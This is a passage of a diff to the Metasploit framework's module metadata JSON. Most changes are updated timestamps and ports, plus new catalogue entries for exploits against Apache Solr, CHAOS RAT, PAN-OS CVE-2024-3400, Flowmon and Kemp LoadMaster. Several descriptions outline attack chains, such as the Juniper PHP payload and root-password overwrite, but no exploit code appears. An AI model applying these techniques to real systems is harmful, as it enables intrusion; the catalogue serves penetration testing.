@@ -34479,7 +34981,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/glassfish_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/glassfish_login",
@@ -35235,7 +35737,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sys_mgmt_login",
@@ -35389,7 +35891,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_login",
@@ -36090,7 +36592,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/ipboard_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ipboard_login",
@@ -36354,7 +36856,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-06-12 14:08:03 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_login",
@@ -36830,7 +37332,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 15:37:48 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/jupyter_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jupyter_login",
@@ -37329,7 +37831,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-11-07 12:23:59 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_desktop_central_login",
@@ -37854,7 +38356,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 16:50:37 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/mybook_live_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mybook_live_login",
@@ -38324,7 +38826,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/octopusdeploy_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/octopusdeploy_login",
@@ -38896,7 +39398,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/phpmyadmin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/phpmyadmin_login",
@@ -40448,7 +40950,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-02-28 15:40:03 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/softing_sis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/softing_sis_login",
@@ -41149,7 +41651,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_web_gateway_login",
@@ -41199,7 +41701,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-09-16 13:34:06 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/syncovery_linux_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/syncovery_linux_login",
@@ -41259,7 +41761,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-12-14 08:59:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/syncovery_linux_token_cve_2022_36536",
@@ -41612,7 +42114,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-11-27 15:35:34 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tomcat_mgr_login",
@@ -42803,7 +43305,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_multicall_creds",
@@ -42962,7 +43464,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_xmlrpc_login",
@@ -44621,7 +45123,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/zabbix_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zabbix_login",
@@ -45226,7 +45728,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-10-02 13:23:15 +0000",
+    "mod_time": "2024-05-13 13:54:14 +0000",
    "path": "/modules/auxiliary/scanner/ldap/ldap_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ldap/ldap_login",
@@ -45912,7 +46414,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-07-01 12:22:31 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/freeswitch_event_socket_login",
@@ -46644,7 +47146,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/mqtt/connect.rb",
    "is_install_path": true,
    "ref_name": "scanner/mqtt/connect",
@@ -46983,7 +47485,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:57:53 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_hashdump",
@@ -47034,7 +47536,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-04-09 15:24:02 +0000",
+    "mod_time": "2024-05-13 13:54:14 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_login",
@@ -47061,7 +47563,7 @@
    "author": [
      "MC <mc@metasploit.com>"
    ],
-    "description": "This module simply queries the MSSQL instance for information.",
+    "description": "This module simply queries the MSSQL Browser service for server information.",
    "references": [

    ],
@@ -47083,7 +47585,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2024-03-04 11:44:04 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_ping",
@@ -47132,7 +47634,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-02-19 10:57:53 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_schemadump",
@@ -47149,6 +47651,57 @@

    ]
  },
+  "auxiliary_scanner/mssql/mssql_version": {
+    "name": "MSSQL Version Utility",
+    "fullname": "auxiliary/scanner/mssql/mssql_version",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Zach Goldman"
+    ],
+    "description": "Executes a TDS7 pre-login request against the MSSQL instance to query for version information.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 1433,
+    "autofilter_ports": [
+      1433,
+      1434,
+      1435,
+      14330,
+      2533,
+      9152,
+      2638
+    ],
+    "autofilter_services": [
+      "ms-sql-s",
+      "ms-sql2000",
+      "sybase"
+    ],
+    "targets": null,
+    "mod_time": "2024-04-22 14:46:50 +0000",
+    "path": "/modules/auxiliary/scanner/mssql/mssql_version.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/mssql/mssql_version",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": [
+      "mssql"
+    ],
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_scanner/mysql/mysql_authbypass_hashdump": {
    "name": "MySQL Authentication Bypass Password Dump",
    "fullname": "auxiliary/scanner/mysql/mysql_authbypass_hashdump",
@@ -47306,7 +47859,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-04-10 12:24:08 +0000",
+    "mod_time": "2024-05-13 13:54:14 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_login",
@@ -47567,7 +48120,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-05-11 13:01:46 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/nessus/nessus_rest_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_rest_login",
@@ -49043,7 +49596,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/pop3/pop3_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/pop3/pop3_login",
@@ -49462,7 +50015,7 @@
      "postgres"
    ],
    "targets": null,
-    "mod_time": "2024-04-09 15:24:02 +0000",
+    "mod_time": "2024-05-13 13:54:14 +0000",
    "path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_login",
@@ -50260,7 +50813,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/redis/redis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/redis_login",
@@ -50594,7 +51147,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/sage/x3_adxsrv_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/sage/x3_adxsrv_login",
@@ -53748,13 +54301,13 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Determine what local users exist via the SAM RPC service",
+    "description": "Determine what users exist via the SAM RPC service",
    "references": [

    ],
    "platform": "",
    "arch": "",
-    "rport": null,
+    "rport": 445,
    "autofilter_ports": [
      139,
      445
@@ -53764,7 +54317,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-02-02 14:26:43 +0000",
+    "mod_time": "2024-05-07 10:54:35 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers",
@@ -53858,7 +54411,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-04-09 15:24:02 +0000",
+    "mod_time": "2024-05-13 13:54:14 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -53891,7 +54444,7 @@
    ],
    "platform": "",
    "arch": "",
-    "rport": null,
+    "rport": 445,
    "autofilter_ports": [
      139,
      445
@@ -53901,7 +54454,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-02-02 14:26:43 +0000",
+    "mod_time": "2024-05-16 10:45:25 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_lookupsid",
@@ -54061,7 +54614,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-01-25 13:58:29 +0000",
+    "mod_time": "2024-05-07 10:54:35 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_version",
@@ -54855,7 +55408,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-04-08 17:41:59 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/snmp/snmp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_login",
@@ -55285,7 +55838,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 15:37:48 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/ssh/karaf_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/karaf_login",
@@ -55529,7 +56082,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login",
@@ -55571,7 +56124,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login_pubkey",
@@ -55987,7 +56540,7 @@
      "telnet"
    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/telnet/brocade_enable_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/brocade_enable_login",
@@ -56199,7 +56752,7 @@
      "telnet"
    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/telnet/telnet_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_login",
@@ -56723,7 +57276,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/varnish/varnish_cli_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/varnish/varnish_cli_login",
@@ -56814,7 +57367,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/vmware/vmauthd_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmauthd_login",
@@ -57408,7 +57961,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/vnc/vnc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vnc/vnc_login",
@@ -57785,7 +58338,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_login",
@@ -65470,7 +66023,7 @@
      "Ron Bowes",
      "jheysel-r7"
    ],
-    "description": "This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls\n          and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin\n          by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being\n          'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP\n          function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling\n          allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses\n          data:// to provide a file inline which includes the base64 encoded PHP payload.\n\n          By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a\n          datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated\n          to the J-Web application, in order to overwrite the the root password hash. If there is no user\n          authenticated to the J-Web application this method will not work. The module then authenticates\n          with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.",
+    "description": "This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls\n          and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin\n          by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being\n          'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP\n          function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling\n          allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses\n          data:// to provide a file inline which includes the base64 encoded PHP payload.\n\n          By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a\n          datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated\n          to the J-Web application, in order to overwrite the root password hash. If there is no user\n          authenticated to the J-Web application this method will not work. The module then authenticates\n          with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.",
    "references": [
      "URL-https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/",
      "URL-https://vulncheck.com/blog/juniper-cve-2023-36845",
@@ -65499,7 +66052,7 @@
      "PHP In-Memory",
      "Interactive SSH with jail break"
    ],
-    "mod_time": "2023-09-29 11:40:03 +0000",
+    "mod_time": "2024-04-15 11:06:50 +0000",
    "path": "/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb",
    "is_install_path": true,
    "ref_name": "freebsd/http/junos_phprc_auto_prepend_file",
@@ -66314,7 +66867,7 @@
    "targets": [
      "Generic RAR file"
    ],
-    "mod_time": "2022-08-22 11:46:50 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
    "path": "/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb",
    "is_install_path": true,
    "ref_name": "linux/fileformat/unrar_cve_2022_30333",
@@ -67223,6 +67776,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/apache_solr_backup_restore": {
+    "name": "Apache Solr Backup/Restore APIs RCE",
+    "fullname": "exploit/linux/http/apache_solr_backup_restore",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-02-24",
+    "type": "exploit",
+    "author": [
+      "l3yx",
+      "jheysel-r7"
+    ],
+    "description": "Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1 is affected by an Unrestricted Upload of File\n          with Dangerous Type vulnerability which can result in remote code execution in the context of the user running\n          Apache Solr. When Apache Solr creates a Collection, it will use a specific directory as the classpath and load\n          some classes from it. The backup function of the Collection can export malicious class files uploaded by\n          attackers to the directory, allowing Solr to load custom classes and create arbitrary Java code. Execution\n          can further bypass the Java sandbox configured by Solr, ultimately causing arbitrary command execution.",
+    "references": [
+      "URL-https://xz.aliyun.com/t/13637?time__1311=mqmxnQ0QiQi%3DDtKDsD7md0%3DnxeqjghDMxTD",
+      "URL-https://github.com/rapid7/metasploit-framework/issues/18919",
+      "URL-https://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC",
+      "CVE-2023-50386"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8983,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2024-04-04 13:41:08 +0000",
+    "path": "/modules/exploits/linux/http/apache_solr_backup_restore.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_solr_backup_restore",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/apache_spark_rce_cve_2022_33891": {
    "name": "Apache Spark Unauthenticated Command Injection RCE",
    "fullname": "exploit/linux/http/apache_spark_rce_cve_2022_33891",
@@ -68354,6 +68970,69 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/chaos_rat_xss_to_rce": {
+    "name": "Chaos RAT XSS to RCE",
+    "fullname": "exploit/linux/http/chaos_rat_xss_to_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-10",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "chebuya"
+    ],
+    "description": "CHAOS v5.0.8 is a free and open-source Remote Administration Tool that\n          allows generated binaries to control remote operating systems. The\n          webapp contains a remote command execution vulnerability which\n          can be triggered by an authenticated user when generating a new\n          executable. The webapp also contains an XSS vulnerability within\n          the view of a returned command being executed on an agent.\n\n          Execution can happen through one of three routes:\n\n          1. Provided credentials can be used to execute the RCE directly\n\n          2. A JWT token from an agent can be provided to emulate a compromised\n          host. If a logged in user attempts to execute a command on the host\n          the returned value contains an xss payload.\n\n          3. Similar to technique 2, an agent executable can be provided and the\n          JWT token can be extracted.\n\n          Verified against CHAOS 7d5b20ad7e58e5b525abdcb3a12514b88e87cef2 running\n          in a docker container.",
+    "references": [
+      "URL-https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc",
+      "URL-https://github.com/tiagorlampert/CHAOS",
+      "CVE-2024-31839",
+      "CVE-2024-30850"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-05-13 16:55:43 +0000",
+    "path": "/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/chaos_rat_xss_to_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "event-dependent",
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/cisco_asax_sfr_rce": {
    "name": "Cisco ASA-X with FirePOWER Services Authenticated Command Injection",
    "fullname": "exploit/linux/http/cisco_asax_sfr_rce",
@@ -73289,7 +73968,7 @@
    "description": "IPFire, a free linux based open source firewall distribution,\n          version < 2.19 Update Core 101 contains a remote command execution\n          vulnerability in the proxy.cgi page.",
    "references": [
      "EDB-39765",
-      "URL-www.ipfire.org/news/ipfire-2-19-core-update-101-released"
+      "URL-https://www.ipfire.org/news/ipfire-2-19-core-update-101-released"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -73312,7 +73991,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-04-17 13:00:41 +0000",
    "path": "/modules/exploits/linux/http/ipfire_proxy_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/ipfire_proxy_exec",
@@ -77616,6 +78295,69 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/panos_telemetry_cmd_exec": {
+    "name": "Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/panos_telemetry_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-12",
+    "type": "exploit",
+    "author": [
+      "remmons-r7",
+      "sfewer-r7"
+    ],
+    "description": "This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that\n          allow an unauthenticated attacker to create arbitrarily named files and execute\n          shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or\n          GlobalProtect Portal enabled and telemetry collection on (default). Affected versions\n          include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,\n          < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to\n          one hour to execute, depending on how often the telemetry service is set to run.",
+    "references": [
+      "CVE-2024-3400",
+      "URL-https://security.paloaltonetworks.com/CVE-2024-3400",
+      "URL-https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/",
+      "URL-https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2024-04-18 18:34:18 +0000",
+    "path": "/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/panos_telemetry_cmd_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/peercast_url": {
    "name": "PeerCast URL Handling Buffer Overflow",
    "fullname": "exploit/linux/http/peercast_url",
@@ -78028,6 +78770,129 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/progress_flowmon_unauth_cmd_injection": {
+    "name": "Flowmon Unauthenticated Command Injection",
+    "fullname": "exploit/linux/http/progress_flowmon_unauth_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-23",
+    "type": "exploit",
+    "author": [
+      "Dave Yesland with Rhino Security Labs"
+    ],
+    "description": "This module exploits an unauthenticated command injection vulnerability in Progress Flowmon\n          versions before v12.03.02.",
+    "references": [
+      "CVE-2024-2389",
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/",
+      "URL-https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-05-28 16:29:55 +0000",
+    "path": "/modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/progress_flowmon_unauth_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_linux/http/progress_kemp_loadmaster_unauth_cmd_injection": {
+    "name": "Kemp LoadMaster Unauthenticated Command Injection",
+    "fullname": "exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-19",
+    "type": "exploit",
+    "author": [
+      "Dave Yesland with Rhino Security Labs"
+    ],
+    "description": "This module exploits an unauthenticated command injection vulnerability in\n          Progress Kemp LoadMaster in the authorization header after vversion 7.2.48.1.\n          The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF) and\n          7.2.48.10 (LTS).",
+    "references": [
+      "CVE-2024-1212",
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/",
+      "URL-https://kemptechnologies.com/kemp-load-balancers"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic",
+      "Do_Not_Prepend_Runonce_Code"
+    ],
+    "mod_time": "2024-04-26 17:36:50 +0000",
+    "path": "/modules/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/progress_kemp_loadmaster_unauth_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
